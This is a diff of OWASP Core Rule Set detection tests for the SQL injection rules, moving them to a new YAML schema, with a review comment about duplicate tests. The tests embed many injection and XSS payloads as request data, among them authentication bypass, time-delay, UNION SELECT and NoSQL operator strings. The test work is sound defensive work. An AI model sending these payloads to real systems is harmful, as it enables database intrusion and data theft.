- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?test=select+if(x"
- version: HTTP/1.0
- output:
- log_contains: id "942170"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?test=select+if(x"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942170]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
index b467c61..8b96a08 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
@@ -1,137 +1,135 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942180.yaml +rule_id: 942180 tests: - - test_title: 942180-1 + - test_id: 1 desc: "basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/get?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - test_title: 942180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/get?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942180] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" - version: HTTP/1.0 - output: - log_contains: id "942251" - - test_title: 942251-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: GET + port: 80 + uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log: + expect_ids: [942251] + - test_id: 2 desc: "Detects having injections negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=having%20fun" - version: HTTP/1.0 - output: - no_log_contains: id "942251" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=having%20fun" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942251] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index 08d6b99..82641f3 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml 
@@ -1,24 +1,22 @@
---
meta:
author: "Christian S.J. Peron, Christian Folini, azurit"
- description: None
- enabled: true
- name: 942260.yaml
+rule_id: 942260
tests:
- - test_title: 942260-1
+ - test_id: 1
desc: "Basic SQL authentication bypass"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- # something LIKE '
- uri: "/get?var=something%20LIKE%20%27"
- version: HTTP/1.0
- output:
- log_contains: id "942260"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ # something LIKE '
+ uri: "/get?var=something%20LIKE%20%27"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942260]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
index 812a061..0afc59e 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
@@ -1,39 +1,37 @@
---
meta:
author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 942270.yaml
+rule_id: 942270
tests:
- - test_title: 942270-1
+ - test_id: 1
desc: "basic sql injection. Common attack string for mysql, oracle and others"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?var=union%20select%20col%20from"
- version: HTTP/1.0
- output:
- log_contains: id "942270"
- - test_title: 942270-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?var=union%20select%20col%20from"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942270]
+ - test_id: 2
desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?test=Xunionselectfrom"
- version: HTTP/1.0
- output:
- log_contains: id "942270"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?test=Xunionselectfrom"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942270]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
index 7608a7f..07d1d74 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
@@ -1,40 +1,38 @@
---
meta:
author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 942280.yaml
+rule_id: 942280
tests:
- - test_title: 942280-1
+ - test_id: 1
desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?var=select%20pg_sleep"
- version: HTTP/1.0
- output:
- log_contains: id "942280"
- - test_title: 942280-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?var=select%20pg_sleep"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942280]
+ - test_id: 2
desc: "SQL Server waitfor delay attack"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--"
- version: HTTP/1.0
- output:
- log_contains: id "942280"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942280]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
index 82f810d..bac7054 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
@@ -1,161 +1,159 @@
---
meta:
author: "csanders-git, azurit"
- description: None
- enabled: true
- name: 942290.yaml
+rule_id: 942290
tests:
- - test_title: 942290-1
+ - test_id: 1
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: GET
- port: 80
- uri: "/get/mongo/show.php?u_id[$ne]=2"
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- version: "HTTP/1.1"
- output:
- log_contains: id "942290"
- - test_title: 942290-2
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: "/get/mongo/show.php?u_id[$ne]=2"
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 2
desc: "basic MongoDB NOSQL injection attempts"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?mongoQ=%5b%24lte%5dasdfsd"
- version: HTTP/1.0
- output:
- log_contains: id "942290"
- - test_title: 942290-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?mongoQ=%5b%24lte%5dasdfsd"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 3
desc: "basic MongoDB NOSQL injection attempts 2"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get/mongo/show.php?u_id[$regex]=2"
- version: HTTP/1.0
- output:
- log_contains: id "942290"
- - test_title: 942290-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get/mongo/show.php?u_id[$regex]=2"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 4
desc: "basic MongoDB NOSQL injection attempts 3"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get/mongo/show.php?u_id[$regex]=2"
- version: HTTP/1.0
- output:
- log_contains: id "942290"
- - test_title: 942290-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get/mongo/show.php?u_id[$regex]=2"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 5
desc: "basic MongoDB NOSQL injection attempts 4"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- headers:
- Accept: "*/*"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Content-Type: application/json
- method: POST
- port: 80
- uri: "/post"
- data: '{"$not": "foo"}'
- version: "HTTP/1.1"
- output:
- log_contains: id "942290"
- - test_title: 942290-6
+ - input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: "/post"
+ data: '{"$not": "foo"}'
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 6
desc: "basic MongoDB NOSQL injection attempts 5"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- headers:
- Accept: "*/*"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Content-Type: application/json
- method: POST
- port: 80
- uri: "/post"
- data: '{"$nor": "foo"}'
- version: "HTTP/1.1"
- output:
- log_contains: id "942290"
- - test_title: 942290-7
+ - input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: "/post"
+ data: '{"$nor": "foo"}'
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 7
desc: "basic MongoDB NOSQL injection attempts 6"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- headers:
- Accept: "*/*"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Content-Type: application/json
- method: POST
- port: 80
- uri: "/post"
- data: '{"$where": "foo"}'
- version: "HTTP/1.1"
- output:
- log_contains: id "942290"
- - test_title: 942290-8
+ - input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: "/post"
+ data: '{"$where": "foo"}'
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 8
desc: "basic MongoDB NOSQL injection attempts 7"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- headers:
- Accept: "*/*"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Content-Type: application/json
- method: POST
- port: 80
- uri: "/post"
- data: '{"$elemMatch": "foo"}'
- version: "HTTP/1.1"
- output:
- log_contains: id "942290"
- - test_title: 942290-9
+ - input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: "/post"
+ data: '{"$elemMatch": "foo"}'
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [942290]
+ - test_id: 9
desc: "basic MongoDB NOSQL injection attempts 8"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- headers:
- Accept: "*/*"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Content-Type: application/json
- method: POST
- port: 80
- uri: "/post"
- data: '{"$text": "foo"}'
- version: "HTTP/1.1"
- output:
- log_contains: id "942290"
+ - input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: "/post"
+ data: '{"$text": "foo"}'
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [942290]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
index f6a8019..4d19c27 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
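Review bot: Tests 3 and 4 send the identical request (`uri: "/get/mongo/show.php?u_id[$regex]=2"` with the same headers), so test 4 ("basic MongoDB NOSQL injection attempts 3") adds no coverage; one of them presumably meant a different operator, and as written a regression on that one path is caught twice while whatever operator was intended is not tested at all. The same applies in 942300.yaml, where tests 1 and 2 both post `data: "var=) when 234 then&foo=bar"` under the same desc. Either give the duplicate a distinct payload or drop it so that the renumbered test ids stay meaningful.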
@@ -1,58 +1,56 @@
---
meta:
author: "Christian S.J. Peron, Franziska Bühler, azurit"
- description: None
- enabled: true
- name: 942300.yaml
+rule_id: 942300
tests:
- - test_title: 942300-1
+ - test_id: 1
desc: "MySQL comments, conditions and ch(a)r injectionss"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=) when 234 then&foo=bar"
- version: HTTP/1.0
- output:
- log_contains: id "942300"
- - test_title: 942300-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=) when 234 then&foo=bar"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942300]
+ - test_id: 2
desc: "MySQL comments, conditions and ch(a)r injectionss"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=) when 234 then&foo=bar"
- version: HTTP/1.0
- output:
- log_contains: id "942300"
- - test_title: 942300-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=) when 234 then&foo=bar"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942300]
+ - test_id: 3
desc: "No false positives with for. Issue #2007"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=booked%20for%202021%28including%202020"
- version: HTTP/1.0
- output:
- no_log_contains: id "942300"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=booked%20for%202021%28including%202020"
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [942300]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
index 1e34f1e..e198085 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
@@ -1,63 +1,61 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942310.yaml +rule_id: 942310 tests: - - test_title: 942310-1 + - test_id: 1 desc: | Chained SQL injection attempts 2/2. This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). This test now checks that no match occurs for something that would have matched the original expression. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - no_log_contains: id "942310" - - test_title: 942310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942310] + - test_id: 2 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" - version: HTTP/1.0 - output: - log_contains: id "942310" - - test_title: 942310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] + - test_id: 3 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" - version: HTTP/1.0 - output: - log_contains: id "942310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 94b3ae3..59c8ca3 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml 
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml 
@@ -1,219 +1,217 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None - enabled: true - name: 942320.yaml +rule_id: 942320 tests: - - test_title: 942320-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 5 desc: "Detects PostgreSQL data conversion with ::int" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=password::int" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=password::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 6 desc: "Detects PostgreSQL data conversion with ::bool" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 